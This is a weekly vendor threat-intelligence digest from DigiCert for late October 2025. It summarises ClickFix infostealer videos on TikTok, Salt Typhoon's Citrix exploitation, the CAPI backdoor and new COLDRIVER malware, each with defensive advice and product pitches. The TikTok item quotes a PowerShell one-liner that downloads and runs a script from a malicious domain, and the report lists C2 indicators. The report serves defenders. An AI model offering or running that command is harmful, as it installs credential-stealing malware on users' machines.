DigiCert’s Open-Source Intelligence (OSINT) Report – October 17 – October 23, 2025

TikTok Videos Continue to Push Infostealers in ClickFix Attacks

(TLP: CLEAR) Recent threat intelligence has highlighted a rise in ClickFix-style attacks propagated through TikTok videos, where cybercriminals use social engineering to trick users into executing malicious PowerShell commands. These videos often claim to offer free activation or cracked versions of popular software such as Windows, Microsoft 365, Adobe Premiere, CapCut Pro, or Discord Nitro. Victims are instructed to open PowerShell with administrator privileges and run a single-line command such as iex (irm slmgr.win/photoshop), which uses PowerShell’s Invoke-Expression and Invoke-RestMethod to retrieve and execute a remote script from a malicious domain (e.g., slmgr.win). Once executed, this script downloads two executable payloads hosted on Cloudflare services: updater.exe and source.exe. The first is a known variant of the AuroStealer (also called Aura Stealer) infostealer malware. It is designed to exfiltrate sensitive user data, including browser-stored credentials, authentication cookies, crypto wallet contents, and application-specific credentials. The second payload, source.exe, is a .NET binary that uses the built-in C# compiler (csc.exe) at runtime to compile and inject additional code into memory, likely for further exploitation or to establish persistence, though its full behavior is not yet fully understood.

(TLP: CLEAR) Comments: This campaign underscores the increasing use of social platforms particularly TikTok as vectors for malware delivery, leveraging trust in community-shared content and user interest in free or pirated software. Once the malicious chain is executed, compromised systems should be considered fully exposed, with all stored credentials assumed stolen. Victims are advised to reset passwords across all services and enable multi-factor authentication wherever possible. Additionally, organizations should educate users to avoid running unfamiliar shell commands from untrusted sources and implement endpoint defenses capable of detecting script-based threats, fileless malware execution, and credential theft.

(TLP: CLEAR) Recommended best practices/regulations: NIST SP 800-53 Rev5 SI-3: “MALICIOUS CODE PROTECTION 

Control: 

• Implement [Selection (one or more): signature based; non-signature based] malicious code protection mechanisms at system entry and exit points to detect and eradicate malicious code. 
• Automatically update malicious code protection mechanisms as new releases are available in accordance with organizational configuration management policy and procedures. 
• Configure malicious code protection mechanisms to: 1. Perform periodic scans of the system [Assignment: organization-defined frequency] and real-time scans of files from external sources at [Selection (one or more): endpoint; network entry and exit points] as the files are downloaded, opened, or executed in accordance with organizational policy; and 2. [Selection (one or more): block malicious code; quarantine malicious code; take [Assignment: organization-defined action]]; and send alert to [Assignment: organization defined personnel or roles] in response to malicious code detection.
• Address the receipt of false positives during malicious code detection and eradication and the resulting potential impact on the availability of the system.

NIST requires malware detection and prevention solutions. This can be on the device, as with anti-virus agents, but also can be augmented by Protective DNS provided by the network that the device is on or across the Internet. This provides defense-in-depth and support for devices such as Internet of Things (IoT) or some servers that cannot run an endpoint client.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Source: https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/ 

Salt Typhoon Uses Citrix Flaw in Global Cyber-Attack

(TLP: CLEAR) The China-linked advanced persistent threat (APT) group known as Salt Typhoon (also tracked as Earth Estries, GhostEmperor, or UNC2286) exploited a Citrix NetScaler Gateway vulnerability to breach a European telecommunications organization. This campaign, first identified by Darktrace in early July 2025, is part of Salt Typhoon’s broader operations targeting over 80 countries across critical sectors such as telecommunications, energy, and government. The attackers leveraged a vulnerability in Citrix’s edge infrastructure to gain initial access, then pivoted laterally to Citrix Virtual Delivery Agent (VDA) hosts within the organization’s Machine Creation Services (MCS) subnet. The group employed DLL side-loading techniques to deploy a custom backdoor known as SNAPPYBEE (also called Deed RAT). This method involved placing a malicious DLL alongside legitimate antivirus executables—such as those from Norton, Bkav, or IObit, allowing the malware to be executed under the guise of trusted software. Once inside, Salt Typhoon established communication with its command-and-control (C2) infrastructure using multiple covert channels, including HTTP traffic with forged Internet Explorer headers and unidentified TCP-based protocols. These C2 endpoints were hosted on virtual private servers provided by LightNode, with at least one domain previously linked to Salt Typhoon operations. The attackers further obscured their origin by initiating access through a SoftEther VPN node, complicating attribution and detection.

(TLP: CLEAR) Comments: The tactics observed in this campaign reflect Salt Typhoon’s emphasis on stealth, persistence, and abuse of legitimate software and network appliances. Their use of living-off-the-land techniques and manipulation of trusted binaries highlights the challenges defenders face in distinguishing malicious from benign behavior. Organizations operating Citrix NetScaler appliances or similar edge infrastructure are especially at risk and should ensure timely patching, network segmentation, and enhanced monitoring. Standard antivirus tools are unlikely to detect such sophisticated threats; instead, behavioral analysis and anomaly detection capabilities are essential. The incident serves as a critical reminder of the importance of securing perimeter devices, monitoring unusual DLL activity, and scrutinizing outbound traffic for covert C2 channels.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport

OWASP Web Application Firewall: “A ‘web application firewall (WAF)’ is an application firewall for HTTP applications. It applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. “While proxies generally protect clients, WAFs protect servers. A WAF is deployed to protect a specific web application or set of web applications. A WAF can be considered a reverse proxy. “WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. The effort to perform this customization can be significant and needs to be maintained as the application is modified.”

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in realtime and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

Digicert’s Web Application Firewall, UltraWAF, protects your applications from data breaches, defacements, malicious bots, and other web application-layer attacks. By protecting your applications no matter where they are hosted, UltraWAF simplifies your operations through consistently configured rules with no provider restrictions or hardware requirements.
Source: https://www.infosecurity-magazine.com/news/salt-typhoon-citrix-flaw-cyber/ 

Source: https://thehackernews.com/2025/10/hackers-used-snappybee-malware-and.html 

New .NET CAPI Backdoor Targets Russian Auto and E-Commerce Firms via Phishing ZIPs

(TLP: CLEAR) In October 2025, cybersecurity researchers from Seqrite Labs identified a novel .NET-based backdoor malware dubbed CAPI Backdoor, which appears to be part of a targeted phishing campaign aimed at Russian automobile and e-commerce organizations. The campaign uses spear-phishing emails that deliver a ZIP archive (first seen uploaded to VirusTotal on October 3, 2025) whose name mimics a payroll notification in Russian (e.g., “Перерасчёт заработной платы 01.10.2025”). Inside the ZIP is a decoy Russian-language document (purporting to reference income tax or salary recalculation) and a malicious Windows shortcut (LNK) file bearing the same name. When a user executes the LNK file, the system launches the legitimate Windows binary rundll32.exe to load a .NET DLL payload (typically named adobe.dll) from the user’s Roaming folder. This living-off-the-land (LotL) technique enables the malicious code to evade heuristics by piggy-backing on trusted system binaries. After execution, the implant performs privilege enumeration (checking for administrative rights), enumerates installed antivirus products, and launches the decoy document to distract the user while stealthy activities occur.

(TLP: CLEAR) Comments: The backdoor connects to a hardcoded command-and-control (C2) server at 91.223.75[.]96 and is capable of receiving tasking that includes: harvesting browser data (from Chrome, Microsoft Edge and Firefox), capturing screenshots, collecting system information, enumerating folder contents, and exfiltrating the gathered data back to the attacker. To maintain persistence, the malware uses two main mechanisms: creation of a scheduled task (named for example “AdobePDF”) set to run periodically, and dropping a shortcut (LNK) in the Windows Startup folder that invokes rundll32.exe pointing to the malicious DLL in the Roaming folder. The researchers believe the targeting is specific to the Russian auto sector because one of the domains associated with the campaign is carprlce[.]ru, an impostor of the legitimate Russian site carprice[.]ru. This domain suggests reconnaissance and lure development tailored to the automotive industry in Russia. Overall, the CAPI Backdoor campaign exemplifies a modern targeted attack: leveraging culturally relevant phishing lures, abusing legitimate system binaries for stealth execution, employing anti-analysis and persistence techniques, and focusing on credential/session theft from browsers and systems. Organizations in the Russian automobile and online commerce verticals (and their supply-chain partners) should treat this malware as a high risk, inspect for rundll32.exe executions with unusual DLLs, monitor for scheduled tasks and startup shortcuts pointing to user Roaming directories, and block or monitor outgoing traffic to the identified IP/domain indicators.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.

(TLP: CLEAR) DigiCert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in realtime and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

Source: https://thehackernews.com/2025/10/new-net-capi-backdoor-targets-russian.html  

Source: https://securitybeyondtaboo.com/new-net-capi-backdoor-targets-russian-auto-e-commerce-via-phishing-zips/?utm_source=chatgpt.com 

Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

(TLP: CLEAR) Google’s Threat Intelligence Group (GTIG) revealed that the Russia-linked hacking collective known as COLDRIVER has developed three new families of malware, marking a significant uptick in the group’s operational tempo and sophistication. According to the GTIG, these malware variants emerged from rapid development cycles since May 2025, indicating that COLDRIVER is actively refining and expanding its toolkit. The new families are reportedly tailored to support targeted missions, including intelligence collection and persistent intrusion, aligning with the actor’s longer-term espionage objectives. Rather than relying on large, well-known “payloads”, the group appears to be moving toward modular, bespoke malware designed for specific target classes and campaigns. The GTIG observed that the new malware families exhibit improved features for stealth, evasion and adaptability. For example, they may include refined payload delivery methods, updated command-and-control (C2) protocols, obfuscation layers, and more targeted lateral movement capabilities within compromised networks. Google’s analysis suggests that COLDRIVER is applying lessons learned from prior campaigns—altering tool architecture, refining persistence mechanisms and rapidly retooling based on detection feedback. This evolution underscores a shift from opportunistic attacks toward tailored, sustained operations targeting high-value entities.

(TLP: CLEAR) Comments: From a defensive standpoint, these developments raise the bar for detection and response. The mass rollout of new malware families means that signature-based protections may lag, and behavioral analytics, endpoint telemetry, network monitoring for anomalous C2 activity, and threat-hunting across lateral movement artifacts become increasingly critical. Organizations in sectors of interest to Russian-linked operators should assume that vulnerabilities in both perimeter infrastructure and internal systems can be leveraged, and that adversaries are prepared with multiple, evolving toolsets to maintain access once inside. In short, the revelation of these three new malware families signifies that COLDRIVER is accelerating its capability development, and defenders must adopt a forward-looking posture to anticipate and counter emergent threats.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

• Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.
• Domain generation algorithms: Sites with programmatically generated domain names that are used by malware to circumvent static blocking. Advanced malware – including some botnets – depend on the ability to communicate with command and control (C2) infrastructure. Cyber threat actors use domain generation algorithms (DGAs) for malware to circumvent static blocking – either by domain name or IP – through programmatically generating domain names according to a pre-set seed. PDNS can offer protection from malware DGAs by analyzing every domain’s textual attribute and tagging those associated with known DGA attributes, such as high entropy.

Source: https://thehackernews.com/2025/10/google-identifies-three-new-russian.html